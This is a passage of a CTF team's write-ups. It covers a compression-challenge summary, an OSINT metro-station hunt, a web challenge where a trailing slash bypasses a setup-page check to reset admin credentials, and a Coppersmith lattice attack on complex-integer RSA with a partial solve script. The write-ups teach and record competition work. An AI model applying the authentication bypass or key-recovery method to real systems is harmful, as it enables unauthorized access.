For “style” reasons, I decided to go a little further. Changing the constant 2028 to 2040 reduces the length of the (inefficiently-encoded) tail, at the risk of occasionally failing if the final word is too long. With this change, I was able to quickly obtain a score of 1337 points (flag: 2fdd6a0e1801daa160f5475fb710879dd3f1bf6774da6c92e8f63867849b1cef.1337). I also obtained slightly higher scores (up to 1340: d5aedd5fcd9177849ba5d174c79a7074d66f60d911338616eb044290d9081088.1340), but chose not to submit them. Here’s what the leaderboard looked like by the end of the CTF:

           Team           |     Score       |           Time             
--------------------------+-----------------+----------------------------
 Maple Bacon              | {"score": 1337} | 2024-06-30 19:24:57.567+00
 thehackerscrew           | {"score": 980}  | 2024-06-30 19:49:18.4+00
 r3kapig                  | {"score": 859}  | 2024-06-30 13:29:04.553+00
 The Flat Network Society | {"score": 856}  | 2024-06-29 17:17:16.553+00
 Team Austria             | {"score": 850}  | 2024-06-29 19:03:02.087+00
 Perperikon               | {"score": 843}  | 2024-06-29 19:59:56.281+00
 Brunnerne                | {"score": 837}  | 2024-06-30 12:09:16.699+00
 Kalmarunionen            | {"score": 649}  | 2024-06-30 15:04:40.344+00
 pwnlentoni               | {"score": 603}  | 2024-06-30 10:46:12.362+00
 gsitcia                  | {"score": 512}  | 2024-06-30 01:46:13.402+00

This was a very fun challenge, with a rather unexpected twist in the form of some harsh restrictions on the Python side. Here’s a summary of the solution:

Use gperf to produce a perfect hash function for the wordlist, which can be efficiently implemented in C and compiled with the XC8 compiler.
The compressor outputs 18 bits per word (regardless of word length), plus one bit per 1337-speakable character in the word.
On the decompressor side, smuggle the entire wordlist in a comment to keep the overall size under the command-line argument size, and to avoid blowing the memory limit during exec.
Obtain access to the embedded wordlist by extracting the prog variable from the parent stack frame via an exception object.
Clear sys.argv to free up a bit more memory, and use a nested exec to avoid immediately blowing the memory limit in the outer exec.
Use a binary search to search the wordlist each time, to avoid allocating more than O(1) extra memory, and avoid blowing the CPU time limit on an expensive (but simple) linear search.
Use a slightly more aggressive implementation with a small probability of failure in order to score exactly 1337 points (“style”).
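
To make the bit budget concrete, here is a minimal Python sketch of a bit writer that is compatible with the LSB-first `read_bits` in the decompressor above. The real compressor was written in C, so `BitWriter` and `read_bits_from` are hypothetical names used only for illustration, and the word index 123456 is an arbitrary example value.

```python
class BitWriter:
    """Packs values LSB-first, matching the decompressor's read_bits order."""

    def __init__(self):
        self.buf = bytearray()
        self.nbits = 0

    def write(self, value, n):
        # Emit the n low bits of value, least significant bit first.
        for i in range(n):
            if self.nbits % 8 == 0:
                self.buf.append(0)
            bit = (value >> i) & 1
            self.buf[-1] |= bit << (self.nbits % 8)
            self.nbits += 1


def read_bits_from(data, pos, n):
    """Read n bits LSB-first starting at bit offset pos; return (value, new_pos)."""
    res = 0
    for i in range(n):
        byte = data[(pos + i) // 8]
        res |= ((byte >> ((pos + i) % 8)) & 1) << i
    return res, pos + n


# One word costs 18 bits, plus one bit per leet-able character.
w = BitWriter()
w.write(123456, 18)  # hypothetical 18-bit word code
w.write(1, 1)        # first leet-able character is written as a digit
w.write(0, 1)        # second leet-able character stays a letter

code, pos = read_bits_from(w.buf, 0, 18)
flag1, pos = read_bits_from(w.buf, pos, 1)
flag2, pos = read_bits_from(w.buf, pos, 1)
```

A word with two leet-able characters therefore costs 20 bits, which fits in 3 bytes regardless of how long the word is.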

[R3CTF/YUANHENGCTF-2024] Transit

2024-06-15T00:00:00+00:00

R3CTF/YUANHENGCTF 2024 Transit Challenge [MISC]

Authors: Jade Lovelace, Frank Yan

TL;DR

Utilize the overhead signage to identify the city and metro system. Scan through local Chinese media for any images of local metro rolling stock. Use the rolling stock number to identify the line and stations. Use the street view images and line schematic to identify the station.

Challenge Description

This is an OSINT chal! The city’s rail transit is like the veins of time, glides effortlessly through the concrete jungle, transforming every journey into a flowing tapestry. So which station is this?

The flag format is R3CTF{city_lowercase_name_endswith_station}. For example the Huixin Xijie Nankou station of the Beijing Subway would be R3CTF{beijing_huixin_xijie_nankou_station}.

The Image

Solution

We took the image and stared at it to try to figure out if it was a metro or mainline railway. Our main hint that it was a metro is the grade in the background but we kinda just guessed.

We looked at the overhead signage identifying the supports for the catenary, and noticed that it was in two parts, the first one seemingly being track ID or segment ID or so, and the second one being sequential as you go along the line, as seen in the picture.

We decided to identify the system by dorking Wikipedia and googling around for Chinese metros, looking for ones that use the same style of trackside signage for their overhead lines.

Google results usually yield schematic subway maps of the system. Thankfully Frank does read Chinese, and Baidu is more helpful in giving out images of rolling stock on tracks.

We started out with “[Name of tier one/two Chinese cities] + 地铁轨道交通 + 铁轨” (subway transportation system + railtracks) and found some images.

Shanghai does not have visible hanging signs on overhead powerlines.

Beijing does use a few hanging signs, but they are usually three digit numbers on a blue background.

Chengdu, on the other hand, uses a three-character system with the first character being a letter. Although the color scheme does resemble the one in the image (black letters on white), it uses a different font with wider characters.

After going through an exhaustive list of tier one and two Chinese cities, we stumbled upon a picture from Hangzhou’s metro system.

It has overhead signage that actually matches the same track segment, M368.

We now have the rolling stock number 190181 and the line color turquoise blue. Given that the majority of Chinese systems use a numbered system to name metro lines and associate a unique color to each line, we are getting closer to the flag.

We then went on Wikipedia looking at Hangzhou metro, to figure out which line it was by looking at the rolling stock and found it was line 19:

Line 19 is an airport express line that only partially opened in 2022. Baidu Baike tells us that there are four elevated stations on line 19.

高架 means elevated while 地下 means underground. This helps us to narrow down to

御道站(Yudao Station)
平澜路站 (Pinglan Road Station)
耕文路站 (Gengwen Road Station)
知行路站 (Zhixing Road Station)

These stations all share the common features of being elevated and running in parallel along the Hangyong Expressway (the viaduct in the picture).

We decided to further examine the street view at each of the four sites.

平澜路站 (Pinglan Road Station) provides a view of a four-lane highway with rows of trees densely lined to its sides. We decided to move on to the other three stations, but the same highway is repeated throughout.

Until we realized…

These images are from August 2017.

Clearly, given China’s otherworldly pace of construction, most information from 2017 can be considered to be outdated.

Hence, we just tried to input the names of the four stations.

Flag

R3CTF{hangzhou_zhixing_road_station}

[NahamCon CTF 2024] Helpful Desk

2024-06-01T00:00:00+00:00

Problem Description

HelpfulDesk is the go-to solution for small and medium businesses who need remote monitoring and management. Last night, HelpfulDesk released a security bulletin urging everyone to patch to the latest patch level. They were scarce on the details, but I bet that can’t be good…

This was categorized as a web challenge, although most of my time on it was spent reverse engineering.

Difficulty: easy

Initial Research

Opening up the URL, we see this is supposed to be a login to a remote access software. There’s a note at the top telling us to download the latest update for important security fixes. Clicking the note brings us to an “updates” page with a list of releases we can download. Presumably the current instance is running the old insecure version, so let’s download it and the latest and find the difference.

Exploring the codebase

Downloading the two versions and unzipping them, we see this is a .NET server. Running diff on the folders, we see the only thing that has changed is HelpfulDesk.dll.

Decompiling

Let’s decompile the old and new versions of the DLL with AvaloniaILSpy. Renaming the dlls for convenience to HelpfulDesk-old and HelpfulDesk-new, we can conveniently export the decompiled code to a flat text file by right-clicking each dll and choosing “Save Code.”

Now we can open both files in Emacs and use ediff to find the changes. After skipping through the filenames and a few uninteresting hashes, we only find one significant change:

HelpfulDesk-new.dll

  public IActionResult SetupWizard()
  {
      //IL_0018: Unknown result type (might be due to invalid IL or missing references)
      //IL_001d: Unknown result type (might be due to invalid IL or missing references)
      if (File.Exists(_credsFilePath))
      {
          PathString path = ((ControllerBase)this).get_HttpContext().get_Request().get_Path();
          string text = ((PathString)(ref path)).get_Value().TrimEnd('/');
          if (text.Equals("/Setup/SetupWizard", StringComparison.OrdinalIgnoreCase))
          {
              return (IActionResult)(object)((Controller)this).View("Error", (object)new ErrorViewModel
                                                                    {
                                                                        RequestId = "Server already set up.",
                                                                        ExceptionMessage = "Server already set up.",
                                                                        StatusCode = 403
                                                                    });
          }
      }
      return (IActionResult)(object)((Controller)this).View();
  }

HelpfulDesk-old.dll

  public IActionResult SetupWizard()
  {
      //IL_0018: Unknown result type (might be due to invalid IL or missing references)
      //IL_001d: Unknown result type (might be due to invalid IL or missing references)
      if (File.Exists(_credsFilePath))
      {
          PathString path = ((ControllerBase)this).get_HttpContext().get_Request().get_Path();
          string value = ((PathString)(ref path)).get_Value();
          if (value.Equals("/Setup/SetupWizard", StringComparison.OrdinalIgnoreCase))
          {
              return (IActionResult)(object)((Controller)this).View("Error", (object)new ErrorViewModel
                                                                    {
                                                                        RequestId = "Server already set up.",
                                                                        ExceptionMessage = "Server already set up.",
                                                                        StatusCode = 403
                                                                    });
          }
      }
      return (IActionResult)(object)((Controller)this).View();
  }

Exploit

I don’t know the exact mechanisms here, but at a high level it seems to be controlling access to the /Setup/SetupWizard endpoint. If the credential file exists, it denies access to the endpoint. Presumably the SetupWizard lets us reset credentials, so this ensures only the admin doing the initial setup can access it.

The difference between the function in the old and new files is that the new one strips trailing slashes from /Setup/SetupWizard. We can see the security flaw: if we navigate to the path with the trailing slash, the value.Equals() won’t be triggered, but ASP.NET will ignore the slash and serve us the Setup page.

Giving it a try, this works! I get the setup page and reset the login credentials. I then log in and find the flag on the first connected computer’s desktop.
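
The difference between the two checks can be sketched in Python. This is only a model of the decompiled comparison, not the server's code: `blocked_old` and `blocked_new` are hypothetical names, `str.lower()` stands in for `StringComparison.OrdinalIgnoreCase`, and `rstrip("/")` stands in for `TrimEnd('/')`.

```python
SETUP_PATH = "/Setup/SetupWizard"


def blocked_old(path: str) -> bool:
    # Old build: compares the raw request path, so a trailing slash slips through.
    return path.lower() == SETUP_PATH.lower()


def blocked_new(path: str) -> bool:
    # New build: strips trailing slashes before comparing.
    return path.rstrip("/").lower() == SETUP_PATH.lower()


bypass = "/Setup/SetupWizard/"
old_result = blocked_old(bypass)  # False: the old check lets the request through
new_result = blocked_new(bypass)  # True: the patched check rejects it
```

The exploit relies on the router still mapping the trailing-slash path to the same action, which is what we observed on the live instance.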

[SDCTF 2024] ReallyComplexProblem

2024-05-19T00:00:00+00:00

Problem Description

We have a ciphertext that we have to decrypt in 48 hours. Luckily, one of our guys at the NSA was able to take a screenshot of the computer as it was performing the encryption, unfortunately it only captured part of the screen. Can you help us break the cipher?

Difficulty: Hard
Tags: Crypto
author: 18lauey2

Attachments

CRSA.py LEAK.png

TL;DR

A modified Coppersmith method that converts the complex-valued matrix into a real matrix through a canonical embedding, then solves it like normal.

Introduction, audience, and pre-requisites

This writeup, like most of my writeups, is geared towards people with an elementary understanding of Math. Additionally, this writeup focuses on the logic behind the solution as opposed to just the solution.

The pre-requisites that would be nice to know before reading this are:

The RSA encryption and decryption scheme
Basic modular arithmetic
Matrix algebra (vectors, linear combinations, and matrices)
An elementary understanding of complex numbers

Alright then. Sit tight and buckle up because we are in for a doozy!

Challenge Overview and Inspecting the Code

The challenge performs RSA with complex integers (Gaussian Integers: $\mathbb{Z}[i]$) as opposed to regular Integers $\mathbb{Z}$. A Complex integer is a complex number $a + bi$ such that $a, b \in \mathbb{Z}$.

Fortunately, the logic behind the algorithm, Complex-RSA (CRSA), remains fairly familiar with a few caveats:

We say that a Gaussian integer $w$ is prime if its norm is prime.
- “What’s a norm?” In this case, consider a norm to be defined as $Re(w)^2 + Im(w)^2$. (This can be interpreted, geometrically, as the square of the point’s distance from the origin.)
Once we generate our primes p and q, the rest of the process is the same as regular RSA. (I’m skipping over details for modular exponentiation because it’s not relevant to the challenge.)

The second part of the challenge involves our LEAKed picture, which features a terminal with output that reads the values of N, the ciphertext, and some portion of p. Interestingly enough, we see about two-thirds of both the real and the imaginary part of p, with the rest covered by the beautiful hand-drawn raccoon.

But we’re missing bits! Now what?

You’re right. There is still a bit of work to do if we would like to decrypt our message. Alright, let’s take a deep breath and work step-by-step. What information do we need to retrieve the original plaintext m?

To decrypt a message we need d, which is defined as e^-1 (mod (norm(p)-1)*(norm(q)-1)). To find d, we need p and q, which in turn require us to factor N = pq. To factor N, we would need to “recover” p from the information that was leaked and divide N by p.
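
As a toy illustration of that formula, here is a short Python sketch. The Gaussian integers and the exponent below are hypothetical small values chosen only so that their norms are prime; they have nothing to do with the challenge's parameters.

```python
def norm(re: int, im: int) -> int:
    # Norm of the Gaussian integer re + im*i, as defined above.
    return re * re + im * im


# Toy "primes" (assumed values): 2 + 3i has norm 13, 4 + 5i has norm 41.
p = (2, 3)
q = (4, 5)
e = 7

phi = (norm(*p) - 1) * (norm(*q) - 1)  # (13 - 1) * (41 - 1) = 480
d = pow(e, -1, phi)                    # modular inverse (Python 3.8+)
```

With the real `p` and `q`, the same two lines give the private exponent that the challenge's own decryption routine needs.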

Oh boy. That’s a lot. All these steps are fairly straightforward with the exception of recovering p. So, our goal is to recover this value.

After some painful counting and testing, there are roughly 155 digits in both the real and imaginary parts. We have about 85 and 87 of these digits respectively. (Okay, maybe it wasn’t two-thirds…)

Retrieving these missing bits seems hard. Let’s consider a simpler problem: what if this was regular RSA and we had about 60% of p? As it turns out, someone has solved this problem before.

A Copper sword crafted by the kingdom’s finest blackSmith

Enter the Coppersmith method. In a nutshell, the method finds small integer roots of polynomials modulo a given integer. To clarify, this means that if we have a polynomial of the form $F(x) = x^n + a_{n-1}x^{n-1} + \dots + a_1x + a_0$ where each $a_i$ is an integer taken modulo $N$, and we know that there exists some integer $x_0$ such that $F(x_0) \equiv 0 \text{ (mod N)}$ and $|x_0|$ is less than $N^{\frac{1}{n}}$, we can find $x_0$.

You might be wondering, “cool fact. What does this have to do with us?” The answer is everything. Let me take you through this step-by-step.

Recall that we have knowledge of N, the fact that N = p * q, and a fair chunk of p (let’s say about 110 digits of 155 digits).
We can express p as follows p = the_known_part + the_unknown_part. Mathematically, $p = a + r$ where a and r are the known and unknown parts of p respectively.
- For example if p = 382xx, we would express it as $p = 38200 + r$.
We also have that $r$ is less than $10^{45}$ since $r$ has 45 digits. Thus, we get an upper bound $R = 10^{45}$.
Let’s create a polynomial $f(x)$ modulo $p$. We will define $f(x) = a + x$ where $a$ is a constant which represents the known part of $p$.
- In the definition of the method above, $n = 1$ (aka the degree of the polynomial we must solve)
Now, $f(r) = a + r = p \equiv 0 \text{ (mod p)}$. In other words, $r$ is our small integer root $x_0$ from the definition above.
Note, that $r$ is less than $R$ which is less than $p^{\frac{1}{1}} = p^1$ which is less than $N$.
YAY! This is literally what the Coppersmith method needs to work.
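
The 382xx example above can be written out as a tiny Python sketch. The helper name `split_known` and the concrete value 38291 are assumptions made for illustration only.

```python
def split_known(known_digits: str, total_digits: int):
    """Return (a, R): the known part padded with zeros, and the bound on r."""
    missing = total_digits - len(known_digits)
    a = int(known_digits) * 10**missing
    R = 10**missing
    return a, R


def f(x: int, a: int) -> int:
    # The degree-1 polynomial f(x) = a + x from the text.
    return a + x


a, R = split_known("382", 5)  # p looks like 382xx
p = 38291                     # hypothetical full value, unknown to the attacker
r = p - a                     # the small root we want Coppersmith to find
```

Here `r = 91` is below `R = 100`, and `f(r, a)` is exactly `p`, so it vanishes modulo `p`.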

The Coppersmith Attack is truly one of the attacks of all time

Now that we have the pieces, let’s apply the Coppersmith method to find our $x_0$ ($r$). Firstly, it’s good to understand a bit of our motivation here. It is very difficult to find the roots of an integer polynomial modulo N. However, it is (relatively) trivial to find the roots of the same polynomial over the integers. The method takes in our polynomial $f(x)$, performs a bit of magic, and, in combination with the Howgrave-Graham theorem, converts our polynomial modulo N into a polynomial with the same small roots over the integers (no modulo).

The Howgrave-Graham Theorem

Okay, so the (extremely abridged version of) Howgrave-Graham Theorem states that for a polynomial $g(x)$, if:

$g(x_0) \equiv 0 \text{ (mod }b^k\text{)}$ for some $b, k$
$abs(x_0) \le R$ Where R is the upper bound we discussed earlier
The length of the coefficient vector of $g(R \cdot x)$ is small. (The coefficient vector refers to the vector containing the coefficients of each term in our polynomial $[a_n, a_{n-1}, …, a_1, a_0]$.)
- Small is once again defined as being less than some bound based on $b, k$ and the degree of $g(x)$. However, it’s not relevant to us because we will fulfill it at the end. (Haha! this might be foreshadowing)

then $g(x_0) = 0$ over the integers too. That is, $x_0$ is an integer root.
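
For reference, the “small” condition is usually stated as follows. This is the standard textbook form rather than something taken from the challenge; here $n$ denotes the number of monomials in $g$ and $\lVert \cdot \rVert$ is the Euclidean length of the coefficient vector:

$$\lVert g(R \cdot x) \rVert < \frac{b^k}{\sqrt{n}}$$

Intuitively, if every term of $g(x_0)$ is this small, then $|g(x_0)| < b^k$, and the only multiple of $b^k$ in that range is $0$.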

Great! Let’s use this on $f(x)$. Well… we can’t use it just yet because the coefficients of the polynomial $f(R\cdot x)$ are huge. In particular, the constant term $a$ has the same number of digits as $p$. This fails the third condition in the Howgrave-Graham theorem, which wants a small coefficient vector. Fortunately, there’s a way to fix this.

Reducing the Size of our Massive Polynomials

At first glance, it seems difficult to reduce the size of our coefficients. However, all we need is a small cameo from our good old friend: linear combinations.

Suppose I had two polynomials $a(x)$ and $b(x)$ such that $a(x_0) \equiv b(x_0) \equiv 0 \text{ (mod m)}$ for some integers $m$ and $x_0$. Note that $a(x_0)$ doesn’t necessarily equal $b(x_0)$. Now, we have that $a(x_0) + b(x_0) \equiv 0 \text{ (mod m)}$. Trivially, we also have that $l \cdot a(x_0) \equiv 0 \text{ (mod m)}$ for any integer $l$. Thus, for any integers $l$ and $k$, we get $l \cdot a(x_0) + k \cdot b(x_0) \equiv 0 \text{ (mod m)}$.

In summary, we just showed that any integer linear combination of two polynomials preserves the root $x_0$ over our modulus $m$. So, this means that if we can find other polynomials which have the same root, $x_0$, as $f(Rx)$ (and $f(x)$) modulo $p$, then we can craft an integer linear combination between them to reduce the size of our coefficients. (Note: this is similar to the idea of row reductions in matrix algebra.)
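
A quick numeric sanity check of this claim, as a Python sketch. The modulus, root, and the two polynomials below are toy values picked for illustration.

```python
m = 7    # toy modulus
x0 = 3   # shared root modulo m


def a(x: int) -> int:
    return x + 4       # a(3) = 7, a multiple of 7


def b(x: int) -> int:
    return x * x + 5   # b(3) = 14, also a multiple of 7


# Every integer linear combination l*a + k*b still vanishes at x0 modulo m.
all_zero = all(
    (l * a(x0) + k * b(x0)) % m == 0
    for l in range(-5, 6)
    for k in range(-5, 6)
)
```

Note that `a(x0)` and `b(x0)` are different integers (7 and 14); only their residues modulo `m` agree.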

A Trick to Create Unlimited Polynomials

Our long chain of dominos continues as we search for polynomials with the same root $x_0$ as $f(x)$ over our modulus p. For convenience, I will call this set of polynomials $F$. The problem is we don’t know $p$, so we can’t make polynomials like $g(x) = px^2 + 4px + p^3$ which will always be 0 for all values of $x$. (They’re not particularly useful either). Let’s use some clever tricks instead.

Firstly, we know $N$ which is a multiple of $p$ so $g(x) = N \equiv 0 \text{ (mod p)}$ for all $x$ including $x_0$. Let’s add it to $F$.
Next, we have that $f(x_0) \equiv 0 \text{ (mod p)}$. We could square both sides and get: $[f(x_0)]^2 \equiv 0 \text{ (mod p)}$. Nice! Let’s add $[f(Rx)]^2$ to $F$.
Why stop there? We can just continue raising $f(Rx)$ to various integer powers and have the same outcome as above. We can thus add all the powers of $f(Rx)$ to $F$.

Now, we have a long list of polynomials to choose from. An alternative to this method would be to simply multiply $f(Rx)$ by different powers of $x$. However, the downside to this method is that we would lose our constant term in the elements of $F$. Using the powers of $f(Rx)$ is much more elegant in the sense that, due to the binomial theorem, we are bound to have constant terms.

The Magical Mysteries of the Lattice and LLL

We have a list of polynomials with the same root $x_0$ whose coefficients we seek to reduce through their integer linear combinations. It remains to be asked: “How do we determine the most efficient integer linear combinations?” It’s time to introduce Lattices and LLL.

Introducing our New Show: DeComplexify This!

Today, we will be learning what a Lattice is and how LLL might help our little predicament. Recall that if we were working with the Real numbers, we could simply use a matrix to reduce the size of a basis and make it orthogonal using the Gram-Schmidt method. However, we are working over the Integers, where the same strategy cannot be used.

Introducing the Lattice. No, not the lattice from Organic Chemistry. An n x n (integer) lattice is essentially just like an n x n matrix with two exceptions:

All the elements in our lattice are integers
The Span of our vectors refers to just the integer linear combinations. (Instead of real coefficients for matrices).

To clarify: We will exclusively be talking about integer lattices, hereby referred to as just lattices.

Like a matrix, we can express our polynomial f(Rx) in the form of a row vector. In fact, you’ve already seen this before in the form of our coefficient vectors.

We can create a matrix using some of our polynomials in $F$, where each row is a polynomial and each column represents the coefficients of a power of $x$. For example, we can create a matrix using the polynomials $g(x) = N$, $f(Rx)$, $[f(Rx)]^2$.
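
A minimal Python sketch of that matrix for $f(x) = a + x$, with the constant term in the leftmost column. The helper names `poly_mul` and `lattice_rows` and the toy values of `N`, `a`, and `R` are assumptions for illustration.

```python
def poly_mul(p, q):
    """Multiply two polynomials given as coefficient lists (constant term first)."""
    out = [0] * (len(p) + len(q) - 1)
    for i, pi in enumerate(p):
        for j, qj in enumerate(q):
            out[i + j] += pi * qj
    return out


def lattice_rows(N, a, R):
    """Rows for g(x) = N, f(Rx) and f(Rx)^2, padded with zeros to equal width."""
    f = [a, R]            # f(Rx) = a + R*x
    f2 = poly_mul(f, f)   # a^2 + 2aR*x + R^2*x^2
    rows = [[N], f, f2]
    width = max(len(row) for row in rows)
    return [row + [0] * (width - len(row)) for row in rows]


rows = lattice_rows(N=77, a=30, R=10)
# rows == [[77, 0, 0], [30, 10, 0], [900, 600, 100]]
```

The result is lower triangular with a non-zero diagonal, which is one way to see that the rows are linearly independent.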

Now that we have constructed our lattice, let me introduce the LLL algorithm (Lenstra-Lenstra-Lovász). I won’t be going over the nitty-gritty details of this algorithm and will instead treat this as a black box. This algorithm takes in a lattice basis (Basis has the same meaning as in matrix algebra) and outputs a basis for the same lattice whose vectors are shorter and more orthogonal. You can read about it more in this wonderful tutorial. A fun exercise is justifying to yourself that our row vectors are linearly independent of each other.

Once we apply the LLL algorithm on this lattice, our rows, representing polynomials, will now have smaller coefficients. Since the length of our coefficient vector is smaller (that is the whole point of LLL), we can apply Howgrave-Graham’s theorem in order to find $x_0$ by finding the roots of $h(x)$ over the integers. Note that the resulting row vectors will be of the form $h(Rx)$. We simply divide the coefficient of each $x^i$ by $R^i$ to retrieve $h(x)$.
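
Undoing the scaling can be sketched as below. `unscale` is a hypothetical helper name; it assumes the row stores coefficients with the constant term first, so the entry at index `i` carries a factor of `R**i`.

```python
def unscale(row, R):
    """Turn the coefficient vector of h(Rx) back into that of h(x)."""
    coeffs = []
    for i, c in enumerate(row):
        scale = R**i
        if c % scale != 0:
            raise ValueError(f"coefficient {i} is not divisible by R^{i}")
        coeffs.append(c // scale)
    return coeffs


h = unscale([900, 600, 100], 10)
# h == [900, 60, 1], i.e. h(x) = 900 + 60x + x^2
```

The divisibility check should never fail on real LLL output, since every row of the reduced basis is an integer combination of rows that already have this shape.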

We have successfully found $r$ (our $x_0$) and we can reconstruct $p$ by $a + r$. Victory! We solved our simpler RSA problem. Now, to deal with something more complex. (literally)

The Complexities of Complex Numbers

The question now is: “Can we do the same for our complex integers?” The answer is mostly. While most of the theorems extend to the Complex Integers, LLL only operates over the regular integers. To understand how we overcome this problem, let’s first go through our solution up to our roadblock.

Write down N and the known part of p

N = -117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670 + 617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993*I
a = 1671911043329305519973004484847472037065973037107329742284724545409541682312778072234 * 10^70 + 193097758392744599866999513352336709963617764800771451559221624428090414152709219472155 * 10^68 * I

While finding a, we can also define our upper bound $R$ as a pair $R_r$ and $R_i$, bounding the real and imaginary parts of r respectively. These bounds follow from the primes always having about 155 digits in each part (this could be verified with a bit of testing/bruteforcing other limits).
Our $f(x) = a + x$. Instead of this, we can choose to be more verbose and write it as $a + bi + x + i \cdot x$. Here, we treat $i$ similar to a variable and all the coefficients (like $a$ and $b$) are real integers.
We do the same process as before to generate different powers of $f((R_r + R_i \cdot i)x)$ modulo p. (Refer to the challenge code to see how you can take the modulo under a complex number.)
Now, we hit our roadblock of representing our polynomials as row vectors of integers. Well, we could simply double the columns (adding an imaginary part to each power of $x$).
- One more note is that we can double our set from before by adding the imaginary multiple of $f$, such as $-i\cdot f(Rx)$.
Construct a matrix with a lot of these row vectors and perform LLL.
- The reason we need a lot of polynomials has to do with the Howgrave-Graham theorem, which essentially ends up requiring more rows for a greater chance of finding our root.
Find the root of the reduced polynomial over the Complex Integers.
Retrieve r and thus find $p$

Use $p$ to find $q$ and then find $d$ and use $d$ to decrypt our ciphertext given by:

e = 65537
ciphertext = 49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229 - 258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367 * I

Wow, we did it! oh no… It did not work :(

WHY DOESNT IT WORK!!

The short answer is that we need to modify our choice of polynomials because it still fails the conditions for the Howgrave-Graham Theorem. Recall that the Howgrave-Graham theorem limits our choices of $b$, $k$, and the degree of the polynomial. For the theorem, we need $f(x_0) \equiv 0 \text{ (mod }b^k\text{)}$. Previously, we just set $b^k = p$ and called it a day. However, through a long series of proofs that are very well highlighted on this blog, this turns out to be very inefficient: the maximum upper bound for $R$ ends up being very small. The maximum bound is usually defined by some relation $X \approx N^\frac{1}{c(d)}$ where $c(d)$ is a function that depends on the degree, $d$, of our polynomial. Understanding this, our goal is to reduce the growth of $c(d)$ as much as possible. We will be using two techniques to do this (from the same blog post).

The First Technique:

Rather than considering $b^k = p$, we could instead try $b = p$. This would ultimately help increase our upper bound (as described in the blog if you are curious). What changes? Well, unfortunately $f(x_0) \equiv 0 \text{ (mod }p^k\text{)}$ is no longer true. However, this might actually be useful.

I will leave this as an exercise to the curious readers, but it’s trivial to observe that if an integer $a$ divides $b$, then $a^k$ divides $b^k$. Also, if $a$ divides $c$ as well, then $a^k$ divides $c^{i}b^{k - i}$ for any integer $i$ with $0 \le i \le k$. This implies that if we have two polynomials $a(x)$ and $b(x)$ such that $a(x_0) \equiv b(x_0) \equiv 0 \text{ (mod m)}$ for some integer $m$, then $[a(x_0)]^i[b(x_0)]^{k - i} \equiv 0 \text{ (mod }m^k\text{)}$.

So, let’s use the two polynomials we know are divisible by $p$ at $x_0$: $N$ and $f(Rx)$. (yes, N is a polynomial that equates to a constant.) Now, instead of using powers of $f(x)$, we can instead add polynomials of the form $[f(Rx)]^i[N]^{k - i}$ for each integer $i \in [0, k - 1]$ to our set $F$.
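
A small Python check of this divisibility argument over the ordinary integers. All numbers are toy values chosen for illustration: `p = 7`, `N = 7 * 11`, and `f(x) = 30 + x` with root `x0 = 5` modulo `p`.

```python
p, q = 7, 11
N = p * q        # 77, divisible by p
a, x0 = 30, 5
k = 3


def f(x: int) -> int:
    return a + x  # f(x0) = 35, divisible by p


# Each product f(x0)^i * N^(k - i) picks up k factors of p in total.
residues = [(f(x0) ** i * N ** (k - i)) % p**k for i in range(k + 1)]
```

Every entry of `residues` is zero, even though neither `f(x0)` nor `N` is divisible by `p**k` on its own.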

Note that for our complex integers, whenever I add a polynomial $g(x)$ to $F$, I’m also adding its imaginary multiple $-i\cdot g(x)$ to the set. This simply helps with the lattice reduction by giving the LLL algorithm more options to reduce our polynomials by.

Technique Numero Dos:

The second technique, which was discussed directly in the blog, involves multiplying $[f(Rx)]^k$ with various powers of $x$. Recall that $[f(x_0)]^k \equiv 0 \text{ (mod }p^k\text{)}$. So, we add polynomials of the form $x^i[f(Rx)]^k$ for each integer $i \in [0, k - 1]$ to our set $F$ (along with their imaginary multiples). Note that there’s nothing really stopping us from taking a different number of polynomials for the second technique: rather than $k - 1$ polynomials, we can take $5$ or $4000$. Though I’m not sure what those bounds would be.

Back to business

Now that we have created a better lattice, we can finally solve our challenge. Nevermind! There were a lot of Sage-specific bugs that had to be squashed.

Hours later, we can finally use our script to reverse the encryption and encoding to get our flag.

The solve script (finally)

from CRSA import GaussianRational, decrypt
from fractions import Fraction
from Crypto.Util.number import long_to_bytes

ciphertext = 49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229 - 258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367 * I
N = -117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670 + 617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993*I
a = 1671911043329305519973004484847472037065973037107329742284724545409541682312778072234 * 10^70 + 193097758392744599866999513352336709963617764800771451559221624428090414152709219472155 * 10^68 * I


# This function takes in our polynomial and returns two rows
# The first row is the coefficient vector, scaled by the upper bounds, of the regular polynomial
# The second row is the coefficient vector, scaled by the upper bounds, of its imaginary multiple
def get_coefficients(f, R_r, R_i):
    regular = []
    imag_multiple = []
    coeffs = f.list()

    for i, c in enumerate(coeffs):
        regular.extend([c.real() * R_r^i, c.imag() * R_i^i])

    for i, c in enumerate(coeffs):
        imag_multiple.extend([-1 * c.imag() * R_r^i, c.real() * R_i^i])

    return [regular, imag_multiple]

# since our row vectors have different lengths, we need to pad them with zeros
# Note that the solve script reverses the columns. The leftmost column is the constant while
# the rightmost column is the coefficient of the highest degree of x
def rpad(lst, length):
    result = []
    for l in lst:
        result.append(l + [0 for i in range(length - len(l))])
    return result


